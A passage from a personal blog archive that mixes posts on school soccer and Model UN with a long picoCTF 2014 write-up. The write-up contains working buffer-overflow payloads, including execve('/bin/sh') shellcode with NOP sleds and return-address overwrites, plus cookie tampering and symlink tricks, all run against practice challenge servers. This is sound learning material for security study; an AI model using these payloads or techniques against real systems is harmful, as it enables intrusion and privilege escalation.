Neko


65 posts in '~ 2015'

  1. 2016.02.16 Soccer conference
  2. 2015.10.30 AUDMUN2015 review [LIVE]
  3. 2015.09.22 Summary of buffer overflow techniques
  4. 2015.09.05 Hand-ray (reading assembly by hand)
  5. 2014.11.19 picoctf 2014 (6)
  6. 2014.11.01 DAAMUN 1- United Kingdom
  7. 2014.07.31 xavius->death_knight
  8. 2014.07.22 nightmare->xavius
  9. 2014.07.22 strace: let me give it a try.
  10. 2014.07.10 succubus->nightmare

 


I don't want search traffic, so I won't write the conference name, but anyway it's in the video. The one who runs in and makes the tackle is me; the commentator praised me for doing well. I hadn't been a starter all season, then got to start about a week before the conference.
Last year I remember getting a yellow card for a bad tackle lol

I sprained my ankle 3 or 4 days before this conference and wasn't in good shape, but I wrapped it in tape and played three full days. Obviously it got worse, but I probably won't be playing soccer anymore, so it doesn't matter. It's healed a lot, so I can walk like a normal person -_- Next year it's India again, apparently. We went to India last year too...... Anyway, it was fun.




Posted by 에버토끼

The MUN format was quite different, which threw me off. The format itself was different from the MUNs I'd been to before, but the chairs were kind, so it was fine.

I was assigned the United States, and the responsibility was enormous.

So lobbying was possible at any time (almost every motion that was raised passed), but during that time nobody wrote the resolution we were supposed to write; the countries fought so much that I was exhausted. Seriously, when you're arguing and the other side won't listen, there's nothing you can do.

In the end, the resolution was a mashup of what Japan and I wrote; the others didn't write anything.

It was surprisingly sloppy. Of the MUNs I've been to, this one had the most speaking, which was good, but the delegates seemed sloppy.

[LIVE]

4:39 PM

We're in Session 3.

Working on Resolution 1.

I have no idea what the resolution is saying. I just went up and gave a speech against it, and even while speaking I didn't understand what the resolution meant, so I just attacked the parts that looked weak. But apart from the ones who wrote the reso, nobody else seems to understand it either. Fun, heh heh...

4:46 Guys, what's going on? I don't think this can be fixed even with an amendment. Can't we just move on...?

4:58 Amending hard, but nothing has really improved. The underlying ideas contradict each other, so it doesn't make sense. Ugh, I just wish this would end quickly.

6:19 Back from snacks. Reso 1 didn't pass. Reso 2 same. Looks like only ours will pass.

Attaching the reso. We did pretty well.

Resolution.pdf

Afterword: since reso 1 and 2 both failed, the merged one passed, but ours didn't. France refused free trade to the end (...?) and the Latin American countries stabbed us in the back. China is bad. It failed by 2 votes or so.

Sigh,....


Posted by 에버토끼

https://docs.google.com/document/d/15d3f0ZEKxYXsrUNybTQlONGyxY9MVhb8NgDJAPNRCkU/edit?usp=drive_web


I remember putting quite a bit of effort into writing this. During finals...

Posted by 에버토끼


Something I did in bits and pieces last year while going to school. The result is meager compared to the time I spent. It turned up while I was organizing my files for the first time in a while. When I have time, I should do the rest of the ones I have. After doing these two, though, my fear of assembly pretty much disappeared, which was strange. It felt like I could read anything lol

These days.. looking at asm.. makes me uneasy...

And as I keep saying, I hate pointers. (straight face)


re(完).docx

re3(完).docx






Posted by 에버토끼

Hello! Today I'm going to write simple writeups (without the reasoning) to wrap up what I solved in picoCTF 2014. Please feel free to ask questions about specific problems or the reasoning in the comments (press "댓글 0개가 달렸습니다." at the end of this post to write a comment)! Hope you enjoy.


Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter? 
0x912d2e43=2435657283


No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

Chrome right click, click inspect element;

"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"



Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.
Go to https://cve.mitre.org and search for the keyword 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Try a few of the CVEs; the answer is CVE-2014-1542.


Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha


go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript

Enter the message and click "Break code!".


thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy


The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)
(Paragraph #, Line #, Word # from left side) makes up "the flag is Ceremonial plates"


Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?
Open Google Chrome, open Inspect Element, and expand the tag for the gridded part of the website -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08


RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?
Go to google images and paste the image's url, hit enter. The Positronic Man


This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".
0x52657663 and 0x30646521 in little endian are "\x63\x76\x65\x52" and "\x21\x65\x64\x30". Plug the values into the 'data preview' below: \x63\x76\x65\x52\x21\x65\x64\x30. You get the values in ASCII: cveR!ed0


Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symlink the txt file to a .cow file.

pico19855@shell:~$ cd /home/daedalus
pico19855@shell:/home/daedalus$ ls
flag.txt  hint.cow  secret1.cow  secret2.cow  supercow  supercow.c
pico19855@shell:/home/daedalus$ ./supercow secret1.cow
 ____________
< cow_text_1 >
 ------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow
pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow
 ______________
< I_LOV_BNANAS >
 --------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||


Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.

pico19855@shell:/home/daedalus$ cd /problems/grepfriend
pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *
daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6
pico19855@shell:/problems/grepfriend$ 



Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

alert(key); on your javascript console. (The key differs.)


The page at https://picoctf.com says: flag_3645



Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If a signed 32-bit integer overflows past INT_MAX (2147483647), it wraps around to a negative value. Here 1712058 + 2145771590 = 2147483648, one past INT_MAX, so the sum wraps to INT_MIN.

pico19855@shell:~$ nc vuln2014.picoctf.com 50000
Your number is 1712058. Can you make it negative by adding a positive integer?
2145771590
Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!

Thanks for playing.



Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){
    unsigned *ptr;
    unsigned value;

    char key[33];
    FILE *f;

    printf("Welcome! I will grant you one arbitrary write!\n");
    printf("Where do you want to write to? ");
    scanf("%p", &ptr);
    printf("Okay! What do you want to write there? ");
    scanf("%p", (void **)&value);

    printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
    *ptr = value;
    printf("Value written!\n");

    if (secret == 0x1337beef){
        printf("Woah! You changed my secret!\n");
        printf("I guess this means you get a flag now...\n");

        f = fopen("flag.txt", "r");
        fgets(key, 32, f);
        fclose(f);
        puts(key);

        exit(0);
    }

    printf("My secret is still safe! Sorry.\n");
}

pico19855@shell:/home/write_right$ gdb -q write_right
Reading symbols from write_right...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x080485cd <+0>: push   %ebp
<cont..>
   0x0804865b <+142>: movl   $0x8048831,(%esp)
   0x08048662 <+149>: call   0x8048470 <puts@plt>
   0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret' - overwrite this.
   0x0804866c <+159>: cmp    $0x1337beef,%eax
<cont...>
   0x080486fc <+303>: call   0x8048460 <__stack_chk_fail@plt>
   0x08048701 <+308>: leave  
   0x08048702 <+309>: ret    
End of assembler dump.
(gdb) x/wx 0x804a03c
0x804a03c <secret>: 0xdeadbeef
(gdb) q
pico19855@shell:/home/write_right$ ./write_right 
Welcome! I will grant you one arbitrary write!
Where do you want to write to? 0x804a03c
Okay! What do you want to write there? 1337beef
Writing 0x1337beef to 0x804a03c...
Value written!
Woah! You changed my secret!
I guess this means you get a flag now...
arbitrary_write_is_always_right
pico19855@shell:/home/write_right$ 



Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.
#define _GNU_SOURCE   /* for setresgid() in glibc's unistd.h */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void vuln(char *input){
    char buf[16];
    int secret = 0;
    strcpy(buf, input);   /* unbounded copy: in this binary, input past 16 bytes overwrites secret */

    if (secret == 0xc0deface){
        give_shell();
    }else{
        printf("The secret is %x\n", secret);
    }
}

int main(int argc, char **argv){
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}

pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl -e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical



Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...
You see the url of any button: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights
Change it to http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc



ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password? 
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python
import sys

""" Daedalus Corporation encryption script. """

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)
    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()
    input_data = open(sys.argv[2], 'r').read()
    result_data = ""
    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()
    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

// Actually, I kinda got mixed up here, so thanks to the anonymous admin (I don't remember his name) who made this problem. Helped a lot :)

Solution:

#!/usr/bin/python

input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

# the key folds down to one byte, so just try all 256 of them
for password in range (0,256):
    result=xor(input_data, password)
    print result + "\n"


output:
<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE
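Because encrypt() folds the whole password into one byte, there are only 256 possible keys no matter how long the password is. The script below is an added example (not from the original post or the challenge): it ranks every candidate key by how English-like the output is instead of reading 256 printouts, using the ciphertext quoted in the solution above; the function names are my own.

```python
import string

# Ciphertext from the picoCTF 2014 "ZOR" encrypted file, as quoted in the solution above.
CIPHERTEXT = ('Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"'
              'vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq"'
              ':da0c251dc0gfffcd:f6a6`ca4c:`g')

# Rough English letter frequencies (percent), space included; used only to rank keys.
FREQ = {' ': 13.0, 'e': 12.7, 't': 9.1, 'a': 8.2, 'o': 7.5, 'i': 7.0, 'n': 6.7,
        's': 6.3, 'h': 6.1, 'r': 6.0, 'd': 4.3, 'l': 4.0, 'u': 2.8}
PRINTABLE = set(string.printable)


def fold_password(password):
    """ZOR.py's key derivation: the whole password collapses to a single byte."""
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)
    return key


def xor_bytes(data, key):
    """Single-byte XOR over a str, which is all ZOR.py's 'encryption' does."""
    return "".join(chr(ord(ch) ^ key) for ch in data)


def english_score(text):
    """Higher means more English-like; non-printable output is penalised hard."""
    total = 0.0
    for ch in text:
        if ch not in PRINTABLE:
            total -= 20.0
        else:
            total += FREQ.get(ch, 0.0)
    return total


def crack_single_byte_xor(ciphertext):
    """Rank all 256 keys by english_score; return (best_key, plaintext, ranking)."""
    ranking = sorted(((english_score(xor_bytes(ciphertext, k)), k) for k in range(256)),
                     reverse=True)
    best_key = ranking[0][1]
    return best_key, xor_bytes(ciphertext, best_key), ranking


if __name__ == "__main__":
    key, plaintext, ranking = crack_single_byte_xor(CIPHERTEXT)
    print("best key 0x%02x, runner-up 0x%02x" % (key, ranking[1][1]))
    print(plaintext)
    # Passwords that fold to the same byte are interchangeable keys.
    print("fold('aa') = 0x%02x, fold('') = 0x%02x" % (fold_password("aa"), fold_password("")))
```

The top-ranked key gives the readable, correctly cased plaintext; the case-swapped output shown above is the key that differs from it only in bit 0x20.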



Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv


I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind  


you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know  you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name  you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew  have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind  come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth  the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends  how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon  for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind  you can own the earth and still all youll own is earth until you can paint with all the colors of the wind



Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?
chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem
--2014-11-24 10:48:49--  https://picoctf.com/problem-static/reversing/function-address/problem
Resolving picoctf.com (picoctf.com)... 54.83.62.93
Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7266 (7.1K) [application/octet-stream]
Saving to: `problem'

100%[=====================================================================================>] 7,266       --.-K/s   in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls
problem
chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem
chanbin@ubuntu:~/ctf/pico2014$ ./problem
Bet you can't find the address of find_string!
Did you know that "class" appears in "the following class" at index 14?
chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem
Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.
(gdb) p find_string
$1 = {<text variable, no debug info>} 0x8048444 <find_string>
(gdb)


Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?
My first reaction: Omg plz why why at&t
I hand-calculated it. Some people were asking me for hints for this specific question, I just told them if I was able to do this, everyone else could.

Snippet.txt
# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm
# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce
# AT&T syntax by default.

MOV $3187,%ebx   //ebx=3187
MOV $26953,%eax  //eax=26953
MOV $19902,%ecx  //ecx=19902
CMP %eax,%ebx    //compare eax and ebx
JL L1            //jump to L1 if ebx < eax
JMP L2           //else jump to L2

L1:
IMUL %eax,%ebx   //ebx=eax*ebx, ebx=85899211
ADD %eax,%ebx    //ebx+=eax, ebx=85926164
MOV %ebx,%eax    //eax=ebx, eax=85926164
SUB %ecx,%eax    //eax-=ecx, eax=85906262
JMP L3           //goto L3

L2:
IMUL %eax,%ebx   //ebx=eax*ebx
SUB %eax,%ebx    //ebx-=eax
MOV %ebx,%eax    //eax=ebx
ADD %ecx,%eax    //eax+=ecx

L3:
NOP
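As a cross-check on the hand calculation, here is a tiny interpreter for the snippet. It is an added example, not from the original post or the challenge: it supports only the instructions the snippet uses (MOV, CMP, JL, JMP, IMUL, ADD, SUB, NOP) in AT&T operand order, keeps registers as unsigned 32-bit values like the real CPU, and treats JL as a signed compare on the last CMP.

```python
MASK = 0xffffffff

# The picoCTF 2014 "Basic ASM" snippet from above, comments stripped.
SNIPPET = """
MOV $3187,%ebx
MOV $26953,%eax
MOV $19902,%ecx
CMP %eax,%ebx
JL L1
JMP L2
L1:
IMUL %eax,%ebx
ADD %eax,%ebx
MOV %ebx,%eax
SUB %ecx,%eax
JMP L3
L2:
IMUL %eax,%ebx
SUB %eax,%ebx
MOV %ebx,%eax
ADD %ecx,%eax
L3:
NOP
"""


def parse(text):
    """Return a list of (mnemonic, [operands]) plus a label -> instruction index map.
    '//' and '#' comments, as in the page's copy of the snippet, are ignored."""
    code, labels = [], {}
    for raw in text.splitlines():
        line = raw.split("//")[0].split("#")[0].strip()
        if not line:
            continue
        if line.endswith(":"):
            labels[line[:-1]] = len(code)
            continue
        parts = line.split(None, 1)
        ops = [o.strip() for o in parts[1].split(",")] if len(parts) > 1 else []
        code.append((parts[0].upper(), ops))
    return code, labels


def value(op, regs):
    """AT&T operand: $imm is an immediate, %reg a register."""
    if op.startswith("$"):
        return int(op[1:], 0) & MASK
    return regs[op[1:]]


def signed(x):
    """Interpret a 32-bit register value as a signed integer."""
    return x - (1 << 32) if x & 0x80000000 else x


def run(text):
    """Execute until NOP (or the end of the listing) and return the registers."""
    code, labels = parse(text)
    regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    last_cmp = 0            # signed (dst - src) of the last CMP; JL jumps when < 0
    pc = 0
    while pc < len(code):
        mn, ops = code[pc]
        pc += 1
        if mn == "NOP":
            break
        if mn == "JMP":
            pc = labels[ops[0]]
        elif mn == "JL":
            if last_cmp < 0:
                pc = labels[ops[0]]
        elif mn == "CMP":   # AT&T: CMP src,dst compares dst against src
            last_cmp = signed(value(ops[1], regs)) - signed(value(ops[0], regs))
        else:               # two-operand arithmetic: OP src,dst  ->  dst = dst OP src
            src, dst = value(ops[0], regs), ops[1][1:]
            if mn == "MOV":
                regs[dst] = src
            elif mn == "ADD":
                regs[dst] = (regs[dst] + src) & MASK
            elif mn == "SUB":
                regs[dst] = (regs[dst] - src) & MASK
            elif mn == "IMUL":
                regs[dst] = (regs[dst] * src) & MASK
            else:
                raise ValueError("unsupported instruction: " + mn)
    return regs


if __name__ == "__main__":
    print(run(SNIPPET))   # eax is the answer to the challenge
```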



Delicious! - 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?
I used the Google Chrome extension EditThisCookie. Your session is stored in the cookie value <session_id>. Change it to a number from 1 to 50 (I'd recommend 50), and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.
We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards. 

Today's secret Daedalus code is: session_cookies_are_the_most_delicious



Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.
shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symbols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <give_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl -e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great




Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.
TBH: I have no memory of solving this (I remember asking about it, though). I think I used a more "professional" way when I first solved it, but since the password is hardcoded (the hint), I just cat the program.

<gibberish>

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

<gibberish>

pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test
______  
_ _ _____
| _ \ | | | | / __ \
| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __
| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \
| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) |
|___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/
| |
|_|
Password: 2manyHacks_Debug_Admin_Test
Authorization successful.
403-shutdown-for-what



No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at /home/no_overflow/ on the shell server. The source can be found here.

How to find where the return address is: start with about 260 bytes and work your way up until eip gets changed. Thanks barrebas for answering some of my questions (I solved this problem after the competition ended.)

The program limits how much you may enter. However, the length check is a signed comparison: a negative number passes it, and read() then treats that negative length as a huge unsigned size, so the input is no longer bounded at all.

Don't forget to run ulimit -c unlimited so that a core file gets written.

pico19855@shell:~$ cat no_overflow.c
#define _GNU_SOURCE   /* for setresgid() in glibc's unistd.h */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 256
void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);      /* a negative int length becomes a huge size_t here */
    printf("Hello, %s\n!", buf);
}
void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}
int main(int argc, char **argv){
    int length;
    be_nice_to_people();
    puts("How long is your name?");
    scanf("%d", &length);
    if(length < BUFSIZE) //don't allow buffer overflow (signed compare: any negative length passes)
        greet(length);
    else
        puts("Length was too long!");
}

pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow
How long is your name?
What is your name?
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LC_CTYPE = "UTF-8",
LANG = "en_US.UTF-8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Hello, 1Ph//shh/bin‰PS‰嘯
                                                                                                                     €莽咽œ昶苔ƒ嚆
 
Segmentation fault (core dumped)
pico19855@shell:~$ gdb -q -c core
[New LWP 5132]
Core was generated by `./no_overflow'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffd6c5 in ?? ()
(gdb) x/40wx $esp-200
0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f
0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c
0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b
0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000
0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c
0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734
0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000
0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a
(gdb) q

pico19855@shell:~$ cd /home/no_overflow
pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow
How long is your name?
What is your name?
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LC_CTYPE = "UTF-8",
LANG = "en_US.UTF-8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Hello, 1Ph//shh/bin‰PS‰嘯
                                                                       €莽擎|昶苔ƒ嚆
ls
Makefile  core flag.txt  no_overflow  no_overflow.c
cat flag.txt
what_is_your_sign


Posted by 에버토끼

These are the country report, position paper (policy statement) and resolution I submitted for this year's Model UN held at DAA.

I participated in ECOSOC as the UK; the topics were "Measures to ensure gender equity in the MENA region" and "The question of food and water security in the MENA region". It was a small school event, so I didn't research much or prepare properly, and there's no individual resolution. lol Since it's not solely my own work, please treat it only as a reference.



ECOSOC-GenderEquality-UK_PositionPaper.docx


Food and Water Scarcity-Resolutions.docx


Gender equity measures-Resolution Qatar, Saudi Arabia, Egypt.doc


GenderEquality-Resolutions.docx


UK_CountryReport.docx


Water and Food UK Saudi Arabia Turkey Singapore.docx





Posted by 에버토끼

This one took some thinking, but I'd really wanted to try socket programming, so I think I had fun clearing it.

